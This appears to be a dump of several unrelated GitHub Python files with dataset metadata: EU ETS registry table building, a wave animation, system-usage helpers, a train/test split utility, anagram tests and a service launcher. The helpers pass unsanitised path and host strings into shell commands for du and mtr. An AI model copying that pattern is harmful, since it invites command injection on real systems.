\"city\": \"city\",\n        \"country\": \"country_id\",\n        \"telephone1\": \"telephone1\",\n        \"telephone2\": \"telephone2\",\n        \"eMail\": \"eMail\",\n        \"legalEntityIdentifier\": \"legalEntityIdentifier\",\n        # \"accountID\": \"account_id\"\n    }\n    df = df.rename(columns=cols_accountHolder)[cols_accountHolder.values()].copy()\n\n    # add euets label trading system\n    df[\"tradingSystem\"] = \"euets\"\n\n    # add created timestamp\n    df[\"created_on\"] = datetime.now()\n    df[\"updated_on\"] = datetime.now()\n\n    # save table\n    df.to_csv(dir_out + \"accountHolders.csv\", index=False, encoding=\"utf-8\")\n    # also save the mapping from account holder to accounts\n    df_map_accountHolders.to_csv(dir_in + \"accountHolder_mapping.csv\", index=False)\n    return\n\n\ndef create_table_account(dir_in, dir_out, useOrbis=True):\n    \"\"\"Create account table.\n    AccountHolder table needs to be created first\n    :param dir_data: directory with parsed data\n    :param dir_out: output directory\n    :param useOrbis: use orbis data\"\"\"\n    # get account data and mapping for account types\n    if useOrbis:\n        fn = dir_in + \"accounts_w_orbis.csv\"\n    else:\n        fn = dir_in + \"accounts.csv\"\n    df_acc = pd.read_csv(fn, parse_dates=[\"closingDate\", \"openingDate\"])\n\n    # impute account id used in transactions\n    # note that we deviate from ids used in the EUTL system (i.e., the links\n    # between pages) by having prepended the registry code\n    map_acc_id = (\n        pd.read_csv(dir_in + \"account_mapping.csv\")\n        .set_index(\"accountID\")[\"accountIdentifierDB\"]\n        .to_dict()\n    )\n    df_acc[\"accountIDTransactions\"] = df_acc.accountID.map(map_acc_id)\n    # TODO verify that this is correct. Couldn't it be that the account simply\n    # was never involved in a transaction?\n    df_acc[\"isRegisteredEutl\"] = df_acc[\"accountIDTransactions\"].notnull()\n\n    # mark accounts with status \"closing pending\" as closed\n    # note that accounts with missing status are accounts of MT and CY\n    # in first periods. 
Thus, they are treated as closed\n    df_acc[\"status\"] = (\n        df_acc.status.replace({\"closed\": False, \"open\": True, \"Closure Pending\": False})\n        .fillna(False)\n        .astype(\"boolean\")\n    )\n\n    # rename columns\n    cols_account = {\n        \"accountID\": \"accountIDEutl\",\n        \"accountIdentifierDB\": \"accountIDTransactions\",\n        \"accountName\": \"name\",\n        \"registryCode\": \"registry_id\",\n        \"accountType\": \"accountType_id\",\n        \"openingDate\": \"openingDate\",\n        \"closingDate\": \"closingDate\",\n        \"status\": \"isOpen\",\n        \"commitmentPeriod\": \"commitmentPeriod\",\n        \"companyRegistrationNumber\": \"companyRegistrationNumber\",\n        \"installationID\": \"installation_id\",\n        \"isRegisteredEutl\": \"isRegisteredEutl\",\n    }\n    if useOrbis:\n        cols_account.update(\n            {\n                \"jrcBvdId\": \"bvdId\",\n                \"jrcLEI\": \"jrcLEI\",\n                \"jrcRegistrationIdType\": \"jrcRegistrationIdType\",\n                \"jrcRegistrationIDStandardized\": \"jrcRegistrationIDStandardized\",\n                \"jrcOrbisName\": \"jrcOrbisName\",\n                \"jrcOrbisPostalCode\": \"jrcOrbisPostalCode\",\n                \"jrcOrbisCity\": \"jrcOrbisCity\",\n            }\n        )\n    df_acc = df_acc.rename(columns=cols_account)[cols_account.values()].copy()\n\n    # impose accountTypes_ids\n    df_acc.accountType_id = df_acc.accountType_id.map(map_account_type_inv)\n\n    # make account id unique\n    def form_id(row):\n        if pd.notnull(row[\"installation_id\"]):\n            return f'{row[\"registry_id\"]}_{int(row[\"installation_id\"])}'\n        return\n\n    df_acc.installation_id = df_acc.apply(form_id, axis=1)\n\n    # Clean account names:\n    df_acc[\"name\"] = df_acc[\"name\"].map(lambda x: \"-\".join(x.split(\"-\")[1:])[4:])\n\n    # add EU offset accounts by hand\n    # NOTE: We could also identify the missing accounts by non-matches and download the information\n    res = []\n    for i in NEW_ACC:\n        print(\"Added missing account:\", i)\n        if i[\"accountIDEutl\"] in df_acc.accountIDEutl:\n            continue\n\n        res.append(i)\n    df_new = pd.DataFrame(res)\n    if len(df_new) > 0:\n        df_acc = pd.concat([df_acc, df_new])\n\n    # add the corresponding account holder ID\n    mapper = (\n        pd.read_csv(dir_in + \"accountHolder_mapping.csv\")\n        .set_index(\"accountID\")\n        .accountHolderID.to_dict()\n    )\n    df_acc[\"accountHolder_id\"] = df_acc[\"accountIDEutl\"].map(lambda x: mapper.get(x))\n\n    # add created timestamp\n    df_acc[\"created_on\"] = datetime.now()\n    df_acc[\"updated_on\"] = datetime.now()\n\n    # add column to identify trading system\n    df_acc[\"tradingSystem\"] = \"euets\"\n\n    # save to csv\n    df_acc.to_csv(dir_out + \"accounts.csv\", index=False, encoding=\"utf-8\")\n    return\n\n\ndef create_table_transaction(dir_in, dir_out):\n    \"\"\"Create transaction table. This has to be run after\n    all other tables have been created.\n    :param dir_data: directory with parsed data\n    :param dir_out: output directory\"\"\"\n    # load data: we need original transaction data as well as\n    # the account table with new account ID. 
Also load already\n    # created project table to (eventually) add further projects.\n    # Finally, unit type mappings to map to unitType_id\n    # merge information from main transaction table to blocks\n    df = pd.read_csv(\n        dir_in + \"transactionBlocks.csv\",\n        low_memory=False,\n        parse_dates=[\"transactionDate\"],\n    )\n\n    # extract cdm projects included in transaction data\n    # in version 05/2021 that does not seem to be necessary anymore\n    # NOTE: Here we drop one entry for project 5342 which has origin entries GH and NG.\n    df_proj_trans = (\n        df[[\"projectID\", \"projectTrack\", \"originatingRegistry\"]]\n        .dropna(subset=[\"projectID\"])\n        .drop_duplicates(subset=[\"projectID\"])\n    )\n    df_proj_trans.columns = [\"id\", \"track\", \"country_id\"]\n\n    df_proj_trans[\"created_on\"] = datetime.now()\n    df_proj_trans[\"updated_on\"] = datetime.now()\n    df_proj_trans[\"source\"] = \"transactions\"\n    df_proj_trans\n    df_proj = pd.read_csv(dir_out + \"offset_projects.csv\")\n    df_proj[\"source\"] = \"surrendering_details\"\n    # only include those additional projects\n    df_proj_trans = df_proj_trans[~df_proj_trans[\"id\"].isin(df_proj[\"id\"])]\n    df_proj_new = pd.concat([df_proj, df_proj_trans])\n    df_proj_new.to_csv(dir_out + \"offset_projects.csv\", index=False, encoding=\"utf-8\")\n\n    # create accounts which do not exist in the account table\n    # get accounts with accountID in transaction data but\n    # account missing in account table (all MT0 and CY0)\n    # we create accounts out of the data provided in the\n    # transaction data\n    res = []\n    for pf in [\"acquiring\", \"transferring\"]:\n        df_miss = df[df[pf + \"AccountID\"].isnull()].drop_duplicates()\n        df_miss = df_miss[\n            [\n                pf + \"AccountIdentifierDB\",\n                pf + \"AccountIdentifier\",\n                pf + \"AccountName\",\n                pf + \"RegistryCode\",\n            ]\n        ]\n        df_miss.columns = [\n            \"accountIdentifierDB\",\n            \"accountIDTransactions\",\n            \"accountName\",\n            \"registryCode\",\n        ]\n        res.append(df_miss)\n    df_miss = pd.concat(res).drop_duplicates()\n\n    # for those accounts without an accountIdentifierDB we\n    # create an account \"unknown\" which is unique by country\n    if df_miss[df_miss.accountIdentifierDB.isnull()].registryCode.is_unique:\n        df_miss.accountIdentifierDB = df_miss.accountIdentifierDB.fillna(\n            df_miss.registryCode + \"_unknown\"\n        )\n        df_miss.accountIDTransactions = df_miss.accountIDTransactions.fillna(\"unknown\")\n\n    # these are accounts that are missing in the account database\n    # to easily identify them and to avoid conflicts with newly emerging\n    # account IDs provided by the EUTL, we assign negative integers\n    # as account ids\n    df_miss = df_miss.reset_index(drop=True)\n    df_miss[\"accountIDEutl\"] = -df_miss.index - 1\n    df_miss[\"created_on\"] = datetime.now()\n    df_miss[\"updated_on\"] = datetime.now()\n\n    # also insert the corresponding account id into the\n    # transaction block data\n    map_acc_new = (\n        df_miss[[\"accountIdentifierDB\", \"accountIDEutl\"]]\n        .set_index(\"accountIdentifierDB\")[\"accountIDEutl\"]\n        .to_dict()\n    )\n    for pf in [\"acquiring\", \"transferring\"]:\n        df[pf + \"AccountIdentifierDB\"] = df[pf + \"AccountIdentifierDB\"].fillna(\n            df[pf + \"RegistryCode\"] + \"_unknown\"\n        )\n        df[pf + \"AccountID\"] = df[pf + \"AccountID\"].fillna(\n            df[pf + \"AccountIdentifierDB\"].map(lambda x: map_acc_new.get(x))\n        )\n\n    # Update account list as well as account mapping list\n    df_map_acc = pd.read_csv(dir_in + \"account_mapping.csv\")\n    df_map_acc = pd.concat(\n        [\n            df_map_acc,\n            pd.DataFrame(\n                [[k, v] for k, v in map_acc_new.items()],\n                
columns=[\"accountIdentifierDB\", \"accountID\"],\n            ),\n        ]\n    )\n    df_acc = pd.read_csv(dir_out + \"accounts.csv\", low_memory=False)\n    df_acc = pd.concat(\n        [\n            df_acc,\n            df_miss.rename(\n                columns={\n                    \"accountName\": \"name\",\n                    \"registryCode\": \"registry_id\",\n                }\n            ),\n        ]\n    )\n    mapper = df_map_acc.set_index(\"accountID\")[\"accountIdentifierDB\"].to_dict()\n    df_acc.accountIdentifierDB = df_acc.accountIDEutl.map(lambda x: mapper.get(x))\n    df_acc.to_csv(dir_out + \"accounts.csv\", index=False)\n    df_map_acc.to_csv(dir_in + \"account_mapping_w_esd.csv\", index=False)\n\n    # select and rename transaction columns and save to csv\n    cols_trans = {\n        \"transactionID\": \"transactionID\",\n        \"transactionDate\": \"date\",\n        \"transactionTypeMain\": \"transactionTypeMain_id\",\n        \"transactionTypeSupplementary\": \"transactionTypeSupplementary_id\",\n        \"transferringAccountID\": \"transferringAccount_id\",\n        \"acquiringAccountID\": \"acquiringAccount_id\",\n        \"unitTypeCode\": \"unitType_id\",\n        \"projectID\": \"project_id\",\n        \"amount\": \"amount\",\n    }\n    df = df.rename(columns=cols_trans)\n    df = df[cols_trans.values()]\n    df[\"id\"] = df.reset_index().index\n\n    # add created timestamp\n    df[\"created_on\"] = datetime.now()\n    df[\"updated_on\"] = datetime.now()\n\n    # add information on trading system\n    df[\"tradingSystem\"] = \"euets\"\n\n    # save to csv\n    df.to_csv(dir_out + \"transactionBlocks.csv\", index=False, encoding=\"utf-8\")\n    return\n\n\ndef create_tables_lookup(dir_in, dir_out, fn_nace_codes=None):\n    \"\"\"Create lookup tables.\n    We only alter the header of tables from \"code\" to \"id\"\n    :param dir_data: directory with parsed data\n    :param dir_out: output directory\n    :param fn_nace_codes: name of file with nace classification scheme\n        If None, classification lookup not exported\"\"\"\n    export_mappings(dir_in)\n    for fn in glob.iglob(dir_in + \"*Codes.csv\"):\n        fn_out = dir_out + \"/\" + os.path.basename(fn)\n        df = pd.read_csv(fn, keep_default_na=False)\n        df.columns = [\"id\", \"description\"]\n        df.to_csv(fn_out, index=False, encoding=\"utf-8\")\n    if fn_nace_codes is not None:\n        fn_out = dir_out + \"/\" + os.path.basename(fn_nace_codes)\n        df = pd.read_csv(fn_nace_codes)\n        df.to_csv(fn_out, index=False, encoding=\"utf-8\")\n\n    return\n", "repo_name": "jabrell/eutl_scraper", "sub_path": "eutl_data_augmentation/create_tables.py", "file_name": "create_tables.py", "file_ext": "py", "file_size_in_byte": 38176, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.to_datetime", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 37, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 98, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 99, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 101, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 102, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 103, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 104, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 105, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 106, "usage_type": "call"}, 
{"api_name": "pandas.read_csv", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 115, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pandas.isnull", "line_number": 170, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 182, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 194, "usage_type": "call"}, {"api_name": "mappings.map_registryCodes", "line_number": 228, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 261, "usage_type": "call"}, {"api_name": "mappings.map_registryCodes", "line_number": 265, "usage_type": "argument"}, {"api_name": "pandas.concat", "line_number": 270, "usage_type": "call"}, {"api_name": "pandas.notnull", "line_number": 296, "usage_type": "call"}, {"api_name": "pandas.notnull", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.setdiff1d", "line_number": 298, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 313, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 393, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 394, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 395, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 396, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 397, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 398, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 420, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 423, "usage_type": "call"}, {"api_name": "mappings.map_registryCode_inv.get", "line_number": 427, "usage_type": "call"}, {"api_name": "mappings.map_registryCode_inv", "line_number": 427, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 477, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 488, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 502, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 502, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 503, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 503, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 523, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 553, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 556, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 559, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 559, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 560, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 560, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 574, "usage_type": "call"}, {"api_name": "mappings.map_registryCode_inv", "line_number": 584, "usage_type": "argument"}, {"api_name": "datetime.datetime.now", "line_number": 585, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 585, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 586, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 586, "usage_type": "name"}, {"api_name": "mappings.map_unitType_inv", "line_number": 607, "usage_type": "argument"}, {"api_name": "mappings.map_registryCode_inv", "line_number": 609, 
"usage_type": "argument"}, {"api_name": "datetime.datetime.now", "line_number": 617, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 617, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 618, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 618, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 630, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 646, "usage_type": "call"}, {"api_name": "mappings.map_registryCode_inv", "line_number": 668, "usage_type": "argument"}, {"api_name": "datetime.datetime.now", "line_number": 691, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 691, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 692, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 692, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 712, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 718, "usage_type": "call"}, {"api_name": "mappings.map_account_type_inv", "line_number": 766, "usage_type": "argument"}, {"api_name": "pandas.notnull", "line_number": 770, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 788, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 790, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 794, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 801, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 801, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 802, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 802, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 822, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 838, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 838, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 839, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 839, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 842, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 846, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 872, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 888, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 888, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 889, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 889, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 907, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 908, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 911, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 917, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 918, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 951, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 951, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 952, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 952, "usage_type": "name"}, {"api_name": "mappings.export_mappings", "line_number": 969, "usage_type": "call"}, {"api_name": "glob.iglob", "line_number": 970, "usage_type": "call"}, {"api_name": 
"os.path.basename", "line_number": 971, "usage_type": "call"}, {"api_name": "os.path", "line_number": 971, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 972, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 976, "usage_type": "call"}, {"api_name": "os.path", "line_number": 976, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 977, "usage_type": "call"}]} +{"seq_id": "35689820992", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\ndata = np.loadtxt(\"datos.dat\")\nz=np.zeros(100)\nx=0\n\nfor i in range(len(data)):\n if((i%100)==0 and i!=0):\n z[i%100]=0\n z[(i-1)%100]=0\n plt.title('Ecuacion de onda')\n plt.ylabel('u')\n plt.xlabel('x')\n plt.plot(z,color='g')\n plt.ylim((-2,2))\n plt.savefig(str(x))\n plt.close()\n x+=1\n else:\n z[i%100]=data[i]\n \nos.system('convert -delay 100 -loop 0 *.png cuerda.gif') \n\n", "repo_name": "mlaguna10/MateoLaguna_hw4", "sub_path": "Punto_2/animacion.py", "file_name": "animacion.py", "file_ext": "py", "file_size_in_byte": 516, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.loadtxt", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 6, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "os.system", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "72477992804", "text": "# -*- encoding: utf-8 -*-\n\n\"\"\"\ntankmanager.helpers\n~~~~~~~~~~~~~~~~~~~\n\nCommon for whole app functions.\n\"\"\"\nimport os\nfrom pwd import getpwuid\nimport commands\nimport multiprocessing\n\n\ndef owner_by_path(path):\n return getpwuid(os.stat(path).st_uid).pw_name\n\n\ndef get_usage_fire(lock_pth='/var/lock'):\n is_busy = False\n locks = []\n os.chdir(lock_pth)\n for f in os.listdir('.'):\n if f.startswith('lunapark_') and f.endswith('.lock'):\n is_busy = True\n locks.append({\n 'file_name': f,\n 'created_at': os.path.getmtime(f),\n 'owner': owner_by_path(f),\n })\n return {'is_busy': is_busy, 'locks': locks}\n\n\ndef get_usage_cpu():\n result = dict(zip(['1m', '5m', '15m'], os.getloadavg()))\n result['cores_num'] = multiprocessing.cpu_count()\n return result\n\n\ndef get_usage_disk(path='/home', rec=10):\n result = {}\n retcode, du = commands.getstatusoutput(\\\n 'du -csk %s/* 2>/dev/null | sort -r -n' % path)\n for line in du.split('\\n')[:rec + 1]:\n splt = line.split()\n 
result[splt[1]] = splt[0]\n return result\n\n\ndef get_hops(fqdn):\n retcode, mtr_stdout = commands.getstatusoutput(\\\n 'mtr --report --report-cycles 1 %s' % str(fqdn))\n\n hops = [h.split()[1] for h in mtr_stdout.split('\\n')[1:]]\n\n result = {\n 'hops': hops,\n 'hops_num': len(hops)\n }\n return result\n", "repo_name": "greggyNapalm/firebat-manager", "sub_path": "firemanager/helpers.py", "file_name": "helpers.py", "file_ext": "py", "file_size_in_byte": 1418, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pwd.getpwuid", "line_number": 16, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 16, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 22, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.getmtime", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.getloadavg", "line_number": 35, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 36, "usage_type": "call"}, {"api_name": "commands.getstatusoutput", "line_number": 42, "usage_type": "call"}, {"api_name": "commands.getstatusoutput", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "35030878673", "text": "from conf.conf import logging\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom conf.conf import settings\nfrom connector.connector import get_data\n\n\ndef replace_with_mean(in_data, col_name):\n a = in_data.groupby([col_name])[settings.TARGET].mean().sort_values(ascending=False)\n mean_dict = a.to_dict()\n in_data[f'{col_name}_mean'] = in_data[col_name].map(mean_dict)\n in_data = in_data.drop([col_name], axis=1)\n return in_data\n\ndef intersection(lst1: list, lst2: list) -> list:\n lst3 = [value for value in lst1 if value in lst2]\n return lst3\n\ndef get_train_data(test_size: int):\n data = get_data()[settings.FEATURES]\n categorical_features = ['Ship Mode', 'Segment', 'City', 'State', 'Region', 'Category', 'Sub-Category']\n categorical_features = intersection(settings.FEATURES, categorical_features)\n logging.info(f\"Generating train&test data with test_size={test_size}\")\n data_mean = data\n for i in categorical_features:\n data_mean = replace_with_mean(data_mean, i)\n logging.debug(data_mean.head())\n\n train_data_mean, test_data_mean = train_test_split(data_mean, test_size=test_size, random_state=settings.SEED)\n logging.debug(f\"Train dataset shape: {train_data_mean.shape}\")\n logging.debug(f\"Test dataset shape: {test_data_mean.shape}\")\n\n\n X_train_mean = train_data_mean.loc[:, train_data_mean.columns != settings.TARGET]\n y_train_mean = train_data_mean.loc[:, train_data_mean.columns == settings.TARGET]\n X_test_mean = test_data_mean.loc[:, test_data_mean.columns != settings.TARGET]\n y_test_mean = test_data_mean.loc[:, test_data_mean.columns == settings.TARGET]\n\n return X_train_mean, y_train_mean, X_test_mean, y_test_mean\n\n", "repo_name": "antsareva/model_runner", "sub_path": "model/data_clearing_transformation.py", "file_name": "data_clearing_transformation.py", "file_ext": "py", "file_size_in_byte": 1729, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "conf.conf.settings.TARGET", "line_number": 9, "usage_type": "attribute"}, {"api_name": "conf.conf.settings", "line_number": 9, "usage_type": "name"}, {"api_name": 
"connector.connector.get_data", "line_number": 20, "usage_type": "call"}, {"api_name": "conf.conf.settings.FEATURES", "line_number": 20, "usage_type": "attribute"}, {"api_name": "conf.conf.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "conf.conf.settings.FEATURES", "line_number": 22, "usage_type": "attribute"}, {"api_name": "conf.conf.settings", "line_number": 22, "usage_type": "name"}, {"api_name": "conf.conf.logging.info", "line_number": 23, "usage_type": "call"}, {"api_name": "conf.conf.logging", "line_number": 23, "usage_type": "name"}, {"api_name": "conf.conf.logging.debug", "line_number": 27, "usage_type": "call"}, {"api_name": "conf.conf.logging", "line_number": 27, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 29, "usage_type": "call"}, {"api_name": "conf.conf.settings.SEED", "line_number": 29, "usage_type": "attribute"}, {"api_name": "conf.conf.settings", "line_number": 29, "usage_type": "name"}, {"api_name": "conf.conf.logging.debug", "line_number": 30, "usage_type": "call"}, {"api_name": "conf.conf.logging", "line_number": 30, "usage_type": "name"}, {"api_name": "conf.conf.logging.debug", "line_number": 31, "usage_type": "call"}, {"api_name": "conf.conf.logging", "line_number": 31, "usage_type": "name"}, {"api_name": "conf.conf.settings.TARGET", "line_number": 34, "usage_type": "attribute"}, {"api_name": "conf.conf.settings", "line_number": 34, "usage_type": "name"}, {"api_name": "conf.conf.settings.TARGET", "line_number": 35, "usage_type": "attribute"}, {"api_name": "conf.conf.settings", "line_number": 35, "usage_type": "name"}, {"api_name": "conf.conf.settings.TARGET", "line_number": 36, "usage_type": "attribute"}, {"api_name": "conf.conf.settings", "line_number": 36, "usage_type": "name"}, {"api_name": "conf.conf.settings.TARGET", "line_number": 37, "usage_type": "attribute"}, {"api_name": "conf.conf.settings", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "6950025082", "text": "from ....problems.Arrays_and_Hashing.Valid_Anagram import Solution\nfrom hypothesis.strategies import from_regex, composite\nfrom hypothesis import given\nfrom collections import Counter\nimport pytest\n\n\n@composite\ndef get_params(draw):\n s = draw(from_regex(\"^[a-z]+$\", fullmatch=True))\n t = draw(from_regex(\"^[a-z]+$\", fullmatch=True))\n expected = Counter(s) == Counter(t)\n\n return [s, t, expected]\n\n\n@pytest.mark.parametrize(\n \"s, t, expected\",\n [\n (\"anagram\", \"nagaram\", True),\n (\"rat\", \"car\", False),\n (\"red\", \"de\", False),\n (\"hi\", \"hello\", False),\n ],\n)\ndef test_is_anagram_parametrize(s: str, t: str, expected: bool) -> None:\n test = Solution()\n\n assert test.isAnagram(s, t) == expected\n\n\n@given(get_params())\ndef test_is_anagram_strategies(params: list) -> None:\n s = params[0]\n t = params[1]\n expected = params[2]\n print(params)\n test = Solution()\n\n assert test.isAnagram(s, t) == expected\n", "repo_name": "LuisAPC/pytest_with_Leetcode", "sub_path": "tests/problems/Arrays_and_Hashing/test_Valid_Anagram.py", "file_name": "test_Valid_Anagram.py", "file_ext": "py", "file_size_in_byte": 967, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "hypothesis.strategies.from_regex", "line_number": 10, "usage_type": "call"}, {"api_name": "hypothesis.strategies.from_regex", "line_number": 11, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 12, "usage_type": "call"}, {"api_name": 
"hypothesis.strategies.composite", "line_number": 8, "usage_type": "name"}, {"api_name": "problems.Arrays_and_Hashing.Valid_Anagram.Solution", "line_number": 27, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 17, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 17, "usage_type": "attribute"}, {"api_name": "problems.Arrays_and_Hashing.Valid_Anagram.Solution", "line_number": 38, "usage_type": "call"}, {"api_name": "hypothesis.given", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "33420620555", "text": "# -*- coding: utf-8 -*-\n\nimport importlib\nimport argparse\nimport logging\nimport sys\n\nfrom etutorservice.utils.config_helper import config\nfrom etutorservice.utils.thrift_helper import create_multiplexed_server\nfrom etutorservice.common.db import (\n db_session_manager as session_manager,\n redis_manager,\n)\n\n\ndef _parse_args():\n parser = argparse.ArgumentParser('run tutor service or commands')\n parser.add_argument('-c', '--config', dest='config_file', required=True,\n help='config file path')\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument('-r', '--runservice', action='store_true',\n dest='run_service')\n group.add_argument('-e', '--exec', dest='command_name',\n help='exec command name')\n parser.add_argument('command_args', nargs='*',\n help='sub command args')\n return parser.parse_args()\n\ndef _run_sub_command(command_name, command_args):\n try:\n command_module = 